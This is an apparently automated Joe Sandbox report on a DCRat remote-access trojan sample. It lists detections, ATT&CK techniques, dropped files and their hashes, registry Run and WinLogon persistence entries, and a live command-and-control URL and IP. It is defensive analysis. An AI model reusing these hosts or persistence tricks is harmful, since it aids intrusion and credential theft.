                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe Queries volume information: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe Queries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe Queries volume information: C:\Users\user\Desktop\EQdhBjQw4G.exe VolumeInformation
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe Queries volume information: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe VolumeInformation
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Stealing of Sensitive Information

                            Source: Yara match, File source: 00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: Process Memory Space: EQdhBjQw4G.exe PID: 908, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: RuntimeBroker.exe PID: 8180, type: MEMORYSTR
                            Source: Yara match, File source: EQdhBjQw4G.exe, type: SAMPLE
                            Source: Yara match, File source: 0.0.EQdhBjQw4G.exe.df0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match, File source: 00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, type: DROPPED
                            Source: Yara match, File source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, type: DROPPED

                            Remote Access Functionality

                            Source: Yara match, File source: 00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: Process Memory Space: EQdhBjQw4G.exe PID: 908, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: RuntimeBroker.exe PID: 8180, type: MEMORYSTR
                            Source: Yara match, File source: EQdhBjQw4G.exe, type: SAMPLE
                            Source: Yara match, File source: 0.0.EQdhBjQw4G.exe.df0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match, File source: 00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, type: DROPPED
                            Source: Yara match, File source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, type: DROPPED
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting
                            Valid AccountsWindows Management Instrumentation1
                            Scripting
                            11
                            Process Injection
                            132
                            Masquerading
                            OS Credential Dumping11
                            Security Software Discovery
                            1
                            Taint Shared Content
                            11
                            Archive Collected Data
                            1
                            Encrypted Channel
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job311
                            Registry Run Keys / Startup Folder
                            311
                            Registry Run Keys / Startup Folder
                            11
                            Disable or Modify Tools
                            LSASS Memory1
                            Process Discovery
                            Remote Desktop Protocol1
                            Clipboard Data
                            2
                            Non-Application Layer Protocol
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            41
                            Virtualization/Sandbox Evasion
                            Security Account Manager41
                            Virtualization/Sandbox Evasion
                            SMB/Windows Admin SharesData from Network Shared Drive12
                            Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                            Process Injection
                            NTDS1
                            Application Window Discovery
                            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information
                            LSA Secrets1
                            Remote System Discovery
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                            Obfuscated Files or Information
                            Cached Domain Credentials1
                            System Network Configuration Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                            Software Packing
                            DCSync2
                            File and Directory Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading
                            Proc Filesystem23
                            System Information Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            File Deletion
                            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            [Behavior graph not reproduced. Behavior Graph ID: 1549799, Sample: EQdhBjQw4G.exe, Startdate: 06/11/2024, Architecture: WINDOWS, Score: 100]

                            Source | Detection | Scanner | Label | Link
                            EQdhBjQw4G.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            EQdhBjQw4G.exe | 53% | Virustotal | | Browse
                            EQdhBjQw4G.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            EQdhBjQw4G.exe | 100% | Joe Sandbox ML | |

                            Source | Detection | Scanner | Label | Link
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat | 100% | Avira | BAT/Delbat.C |
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342 |
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 100% | Joe Sandbox ML | |
                            C:\Users\user\Desktop\nmJRokpY.log | 100% | Joe Sandbox ML | |
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 100% | Joe Sandbox ML | |
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 100% | Joe Sandbox ML | |
                            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
                            C:\Users\user\Desktop\FpFoWZYA.log | 100% | Joe Sandbox ML | |
                            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe | 53% | Virustotal | | Browse
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 53% | Virustotal | | Browse
                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 53% | Virustotal | | Browse
                            C:\Users\user\Desktop\CnTGBqTF.log | 24% | ReversingLabs | |
                            C:\Users\user\Desktop\FpFoWZYA.log | 8% | ReversingLabs | |
                            C:\Users\user\Desktop\nmJRokpY.log | 8% | ReversingLabs | |
                            C:\Users\user\Desktop\vTqzCdqK.log | 24% | ReversingLabs | |
                            C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |

                            No Antivirus matches

                            Source | Detection | Scanner | Label | Link
                            861848cm.nyashkoon.ru | 1% | Virustotal | | Browse

                            Source | Detection | Scanner | Label | Link
                            http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php | 100% | Avira URL Cloud | malware |
                            http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php | 1% | Virustotal | | Browse

                            Name | IP | Active | Malicious | Antivirus Detection | Reputation
                            861848cm.nyashkoon.ru | 37.44.238.250 | true | true | | unknown

                            Name | Malicious | Antivirus Detection | Reputation
                            http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php | true | 1%, Virustotal, Browse; Avira URL Cloud: malware | unknown

                                                              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                              37.44.238.250 | 861848cm.nyashkoon.ru | France | | 49434 | HARMONYHOSTING-ASFR | true

                                                              IP
                                                              127.0.0.1

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1549799
                                                              Start date and time:2024-11-06 03:36:07 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 10m 3s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:41
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:EQdhBjQw4G.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:477DB3DE46B7779B63495A8BDB279F2C.exe
                                                              Detection:MAL
                                                              Classification:mal100.spre.troj.expl.evad.winEXE@49/56@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 18.2%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target EQdhBjQw4G.exe, PID 2228 because it is empty
                                                              • Execution Graph export aborted for target EQdhBjQw4G.exe, PID 5264 because it is empty
                                                              • Execution Graph export aborted for target ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, PID 5052 because it is empty
                                                              • Execution Graph export aborted for target ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, PID 7140 because it is empty
                                                              • Execution Graph export aborted for target ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, PID 7924 because it is empty
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 1216 because it is empty
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 1376 because it is empty
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 7776 because it is empty
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 8180 because it is empty
                                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              Time | Type | Description
                                                              02:37:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJ "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:37:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                              02:37:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4G "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                              02:37:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJ "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:37:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                              02:37:44 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4G "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                              02:37:53 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJ "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:38:02 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                              02:38:10 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4G "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                              02:38:27 | Autostart | Run: WinLogon Shell "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:38:35 | Autostart | Run: WinLogon Shell "C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:38:44 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                              02:38:52 | Autostart | Run: WinLogon Shell "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:39:00 | Autostart | Run: WinLogon Shell "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                              21:37:01 | API Interceptor | 158x Sleep call for process: powershell.exe modified
                                                              21:37:14 | API Interceptor | 2427562x Sleep call for process: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe modified
                                                              21:37:15 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                              37.44.238.250 | 3AAyq819Vy.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                               | HcEvQKWAu2.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                                               | k1iZHyRK6K.exe | Get hash | malicious | DCRat | Browse | 452132cm.n9shteam2.top/Processdownloads.php
                                                               | FuWRu2Mg82.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
                                                               | cGZV10VyWC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
                                                               | qZoQEFZUnv.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | rollsroys.top/externaljsapisql.php
                                                               | QDJA9geR12.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | merlion.top/PythongameTrafficDatalifepublic.php
                                                               | Q9AQFOA6YC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
                                                               | T3xpD9ZaYu.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 024171cm.newnyash.top/authgameapiserverlinuxTestcdnDownloads.php
                                                               | bR9BxUAkJW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | nazvanie.top/ExternalVmPythonrequestsecurepacketBigloadlocalprivatetemporary.php
                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                              861848cm.nyashkoon.ru | 3AAyq819Vy.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                              HARMONYHOSTING-ASFR | 3AAyq819Vy.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                               | HcEvQKWAu2.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                               | k1iZHyRK6K.exe | Get hash | malicious | DCRat | Browse | 37.44.238.250
                                                               | FuWRu2Mg82.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                               | cGZV10VyWC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                               | qZoQEFZUnv.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                               | QDJA9geR12.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                               | Q9AQFOA6YC.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                               | T3xpD9ZaYu.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                               | bR9BxUAkJW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                              No context
                                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                              C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 3AAyq819Vy.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                              C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe | 3AAyq819Vy.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | 3AAyq819Vy.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):216
                                                                    Entropy (8bit):5.781139434119925
                                                                    Encrypted:false
                                                                    SSDEEP:3:SpVv7TbzCnUG8z8WTAh8r3siPnjd9cOxDrd3TR8Y32xhIEykfsB2nTxZ16Ichqjz:SHvfCaQoE6ciPn59HdVKBS2TP16j9M
                                                                    MD5:091E2D132A36DFAD136E2246240E991E
                                                                    SHA1:FD3E4C842F8F7F58CD082FBBF56920EA1A9A3528
                                                                    SHA-256:A484D471C9F4CAF61438F9AF2D176B72B52A07D38F483F61859EED20BE93A63E
                                                                    SHA-512:67DE612EB0AAD50E8445401A174F0B30CD5A556F32F2984C02B70AE897966142EE10C211938DD8807D49495E6C402CC19CE02091BC5DC0E391DD6F0426429784
                                                                    Malicious:false
                                                                    Preview:ZHmoWOKJSWV8G3P8YLqnJB4pNbkTWorF1239Q4KrNBYTh2KUvK5KreDYN7a4o0wnpQGO9QreB8aHmlHVRPhLsgXXyfwTdPDWOuoQv5UfcaJtD5vlzFnYTl5I3tZddYAv4D3170jV5BsRXnT2tLeYmpCnzfXCf0CEaXz9C4o8fRcR2nuPZhuS3mJOBPBbchzE9n1AyT0zgf2UMuvMuIm8GuLx
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1719296
                                                                    Entropy (8bit):7.457136013265021
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                    SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                    SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                    SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                    • Antivirus: Virustotal, Detection: 53%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: 3AAyq819Vy.exe, Detection: malicious, Browse
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc1c53458, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.4221483275284068
                                                                    Encrypted:false
                                                                    SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                    MD5:1FA752C16A42294FA4514EBDCA321800
                                                                    SHA1:D55EAE16326163F0D3C1D43D2998B5C0EE09465C
                                                                    SHA-256:7C1460AD6EC0DBCA50E514162DDEE0EB0A3CC0384715303684683594E96504F5
                                                                    SHA-512:89D88B97CABD4F2138FD37605943F2862768AE3E461B02C4C0CC3829965461E939D0EE16D98FDC3CB06940114F9B62818C110E026886FD9968E0257E798D8E9B
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1719296
                                                                    Entropy (8bit):7.457136013265021
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                    SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                    SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                    SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                    • Antivirus: Virustotal, Detection: 53%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: 3AAyq819Vy.exe, Detection: malicious, Browse
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with very long lines (701), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):701
                                                                    Entropy (8bit):5.864523610592362
                                                                    Encrypted:false
                                                                    SSDEEP:12:RY5c/V/qsM2SyXf3T5QlXkq57CgbN64WYubNfewPFM/yJmRfdjrmD829IQw:TFjXf3NQh57CgbN6wgNPFqlf684IQw
                                                                    MD5:452B299D056BC2F20541E7BF45E98B67
                                                                    SHA1:44D8973B1647C99B9ECF6CBFFC5301F4394B581C
                                                                    SHA-256:84469FAAD56CE498FBECB3FD8011537E8863758A3A955E1CCBDF2821BF7B0171
                                                                    SHA-512:D28AD1297F85018DB7D64F1A5C98426AD4E21566862B0C3DA66F57E14E3EDCF5C7FF741AC9CC566D3619E0E58EEAD6A090F12D4DE2193E65E50C10B837E1E083
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
